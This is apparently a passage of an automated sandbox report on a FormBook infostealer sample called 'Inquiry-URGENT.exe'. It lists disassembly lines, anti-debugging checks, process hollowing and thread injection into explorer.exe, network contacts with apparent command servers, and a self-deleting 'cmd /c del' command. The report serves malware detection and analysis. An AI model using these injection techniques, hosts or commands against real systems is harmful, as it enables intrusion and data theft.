          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B27E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B97794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B14F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B420A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B93884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B140E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BAB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B97016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B30050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B461A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B33A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BCD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BD131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04BE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_04B1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeCode function: 3_2_00409B30 LdrLoadDll,
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.139 80
          Source: C:\Windows\explorer.exeNetwork Connect: 213.5.70.60 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.252.217.69 80
          Source: C:\Windows\explorer.exeNetwork Connect: 103.100.209.77 80
          Source: C:\Windows\explorer.exeDomain query: www.tameka-stewart.com
          Source: C:\Windows\explorer.exeDomain query: www.khlopok.club
          Source: C:\Windows\explorer.exeDomain query: www.tovardarom.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.lakeefctmich.com
          Source: C:\Windows\explorer.exeDomain query: www.apexpropertiesltd.com
          Source: C:\Windows\explorer.exeDomain query: www.bajajfinservmutualfund.com
          Source: C:\Windows\explorer.exeDomain query: www.nutritionhawks.com
          Source: C:\Windows\explorer.exeDomain query: www.zambiaedu.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.61.210 80
          Source: C:\Windows\explorer.exeDomain query: www.trasportesemmanuel.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.josiemaran-supernatural.com
          Source: C:\Windows\explorer.exeDomain query: www.lianshangtron.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: B90000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeMemory written: C:\Users\user\Desktop\Inquiry-URGENT.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3424
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeProcess created: C:\Users\user\Desktop\Inquiry-URGENT.exe C:\Users\user\Desktop\Inquiry-URGENT.exe
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Inquiry-URGENT.exe'
          Source: explorer.exe, 00000005.00000000.709771298.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.674242485.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.677454070.0000000005E50000.00000004.00000001.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.674242485.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.674242485.0000000001080000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.937459034.00000000033A0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.701954450.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeQueries volume information: C:\Users\user\Desktop\Inquiry-URGENT.exe VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Inquiry-URGENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3d49a40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Inquiry-URGENT.exe.3c9c210.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.932812676.00000000009A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.937932319.00000000047B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752412248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.938035416.00000000047E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.703892298.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.672109968.0000000003AE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752980571.0000000001020000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.721720431.000000000E486000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.752778848.0000000000BC0000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.Inquiry-URGENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
